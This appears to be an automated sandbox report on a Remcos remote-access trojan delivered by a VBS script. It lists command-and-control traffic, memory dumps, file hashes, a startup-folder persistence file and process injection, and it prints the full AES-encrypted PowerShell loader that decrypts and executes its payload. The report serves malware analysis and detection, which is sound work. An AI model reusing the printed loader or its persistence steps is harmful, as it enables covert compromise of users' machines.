CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
US 8.8.8.8:53 remccoss2023.duckdns.org udp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 tcp

Files

memory/1348-9-0x0000026CA4B80000-0x0000026CA4BA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4r2gs4k2.qj2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1348-10-0x00007FF818020000-0x00007FF818AE1000-memory.dmp

memory/1348-11-0x0000026CA2B00000-0x0000026CA2B10000-memory.dmp

memory/1348-12-0x0000026CA2B00000-0x0000026CA2B10000-memory.dmp

memory/1348-13-0x0000026CA5820000-0x0000026CA5FC6000-memory.dmp

memory/1348-15-0x0000026CA5180000-0x0000026CA518C000-memory.dmp

memory/1348-16-0x0000026CA5590000-0x0000026CA5606000-memory.dmp

memory/1348-17-0x0000026CA56D0000-0x0000026CA56EE000-memory.dmp

memory/688-18-0x00007FF818020000-0x00007FF818AE1000-memory.dmp

memory/688-19-0x000001ECFF3C0000-0x000001ECFF3D0000-memory.dmp

memory/688-20-0x000001ECFF3C0000-0x000001ECFF3D0000-memory.dmp

memory/688-34-0x00007FF818020000-0x00007FF818AE1000-memory.dmp

memory/4388-35-0x0000000000400000-0x0000000000482000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b64ff2ae44d032883eee0bf43885c39f
SHA1 baf974d8bec991bbb2a78448df486e3f8feb9eac
SHA256 ca6c601ebd0645e9a7077b3a9e92f684fcb045b8b4632e0a9a452b86e01c9902
SHA512 9860476548a6793f0f48ae45b1ff3b501737dd485e652114a5c0a15793e08d6d56c6f0caaac29866eb929f1bf61b310e973f35dd8f43a1381eab1faf0ef089f3

memory/1348-39-0x00007FF818020000-0x00007FF818AE1000-memory.dmp

memory/4388-40-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-41-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-43-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-44-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-46-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-47-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-48-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-49-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-50-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-51-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-52-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-53-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-54-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-55-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-57-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-58-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-59-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-60-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-61-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-63-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-64-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-65-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-66-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-67-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-68-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-69-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-71-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-72-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-73-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-74-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-75-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-76-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-77-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-79-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-80-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-81-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-82-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-83-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-84-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-85-0x0000000000400000-0x0000000000482000-memory.dmp

C:\ProgramData\remcos\registros.dat

MD5 c30f9f6e957182ba5ab8a5e6125858b9
SHA1 de442537779bdafea69e0b2017adc5e382db92ff
SHA256 61672d6d56d78c037afa07f62daa17115ac68c3e04aefd4a4884addfb5de77c8
SHA512 196a62b840aa7f4db1d8ec13562b6833bee7d873cf96fad7a2ae062549a44f42742908afd2ed11f99c6921254f16cf9591ef82aab585096f3dc5af1ad4bb7905

memory/4388-87-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-88-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-89-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-90-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-91-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-92-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-93-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-94-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-96-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-97-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-98-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-99-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-100-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-101-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-102-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-104-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-105-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-106-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-107-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-108-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4388-109-0x0000000000400000-0x0000000000482000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2023-12-05 18:38

Reported

2023-12-05 18:44

Platform

win11-20231128-en

Max time kernel

299s

Max time network

297s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

Signatures

Remcos

rat remcos

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3544 set thread context of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4780 wrote to memory of 3544 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4780 wrote to memory of 3544 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3544 wrote to memory of 1064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
PID 3544 wrote to memory of 1064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
PID 3544 wrote to memory of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3544 wrote to memory of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3544 wrote to memory of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3544 wrote to memory of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3544 wrote to memory of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3544 wrote to memory of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3544 wrote to memory of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3544 wrote to memory of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3544 wrote to memory of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3544 wrote to memory of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3544 wrote to memory of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3544 wrote to memory of 1916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = 'k8qwzV8P21gGtVOd7SAXmfQRh03MJ8Ged4nJeFFrdUwM2fadaBY/VhUNeySTG+oRhJ9e56m8gBh4H+lvV3bGt5/4/STem83phMPT5OiQ1pJCN7POF3qxkETdQB1FBgemfV/Sb5PgEuhjs+4iar71WgBaMwmf0egTMyDORL3mT8ucIk/Tro4TtYXBtNVzQnKSKybtqfPKA4qjsO4Rxg3JhxINiAwILViH1c/eV5ymyCnUye5q3UBG5U/M/HtIEHiJEzRqK7TvGFqMXJLPSFhYoQSsEJ6QRBfrnKoYlWSi3+iwj5b1hYRSTnCIuEr7l0jt17vlkvrfq/GatFniAvDUg8SwY98T2yvAl6j1L+2KOg6rnY9odExu2H4pBKVXyD5i6vI7mFEP7RWmE36WXZKeulXG7ZiX5L82vA1uPpnHGC9qpq7YadP/1pxZUt+/Duv0rti0jdyjKVBZiwK+DeIhSGnrQaF7tTREeBIITWLarMrwnlvyXwORDEMWFo61NzGUQoh9DNOfFFrjALQoJdh4V6fqhUUBECbhpY8syBN12l2pDXF/+COo5yyN7yYND0d3rP6M7ZTzdUFJ0wcoZGFiB0K1DQPh+e6k2EvRlSfPhkLfO9LpdCv3JMgTEahtfb0jgmDzX1sq3ZHyXHy/zTaoRRuAtjktJPQVhTZOopGXv6Xak5FmtZF4KN6HWt41P2kAeuMGCfXRA71xIiv/ZZa5w6TUs0e4mVj+mtKoph2m0shsuvBEGPsBYfbT+l4AqEsPi6bV47Yml1bm22e/iBcrEY5CvgLbuNVwDN881rO2/EzWh3b3buHpTW8OKWdXY//WbmNiKiErwSITIYqAs/yvZHgtx62BtfqzrtS3CHGzmP2ziY0sAGmlQl7f7xoC+6Pz0fqO/s3fgOv0Ti9TiZIlzOv/5aOHwZXtFeWHOEMthan8J/261I9yW9JWGdc42XVOnr04TuITT6m7d8t+02s1ftDwrPTUXdLfZvXxvwNR8Qpm8LquSwMajLiDrn1gpBLficCnjZlh7bZVW6vsjpLDhGQU8xjPTJwz3hRlq1lR7Ddi/op236ZEEiAPW+ulcm/W128KYkg/8CsfbDGsZoopcwKClQRDk2jVUuy3kAnz4o3fSTpt8UTWmua6l2q6S37Hyk6Dh14U06Ih4qxL6QAi9jV9XT3AyHOdzT7cYTopKGn9Jpa847OqUI/ixnyXdRr07jxmCR9JC0ZcxGLe0/6dWZqmj/hSOOaoLB6G3iLHuo9pXMQ6QE3Iwk6+uigKC+q6AWNRkz2yI1Ms7mgylxYJLmjCR3urwbGQRdz5SQNwYIY435VyYp7PNEEYDH1Su164ceW2UyoIAVdlI9h6lMfCRWS32zFWnTfw7X5u1ASMdpZPjITVPrKgN3st4K4Okg38K6fAkOZMFzIK/rPiHN1jMEvLn2lNcSj53sWoxCdJcDZEJxbIxCbg258lVibR8l4mea9/Gm1Du4honGCCOQ04OrLgDjcjUFHm6IPapDXlXXlO3qLShW2WkTBVLNmo2mCyb3Khg8tg1HNmypVIRH9bYbWNq5PwLiE4i0gRO8zpFbtoyvZ4A1LUdLmR6gEriE4mjChgL4kT0stuG8d4RpNeIhdxAQjEu1G3UUA5+JusNv5I03apj3rG0awF+5Fx2p61XY83VNbUu6pPOFL08zV64IDK6PaPi7zJ92FbkSYiPjloT8S23k3G/lw6Iw8l1dfmpEC6tRhGoOuqFN1QWwUf8ietmQoZ7aG+vk0Dp5MaHcgSqpAFIudPkgx2UPM8/PCAHw9dlm4H1gLBMSPQxiWhjfFpCF1+DPZDVNt5csuwhqr5gz6O3oLoXvqR+Y5Qpen0ZijFlIsD/sCyFa6ia7R8yT7eAzqAYqaTCuTNVBIuu4/i7tMEJBDytK1XZvwnuwn8urP3S0I3goQmUlECx6iUkg+3bOTTYzXHFbDHP5Mq2zQLnyiHUV38V5PRcY9BL/ByuJlLdILx1lWIglQPsmHUXr2P9jd3Sl9bnql2F8rP4a7XY65ORGh2uRpjBO5TO7lVKdLbzyfU20BSjwv5PyYH57NcYkpzXfNnWxNUsWryAvk=';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 188.114.96.0:443 paste.ee tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
CO 181.142.162.155:4576 remccoss2023.duckdns.org tcp
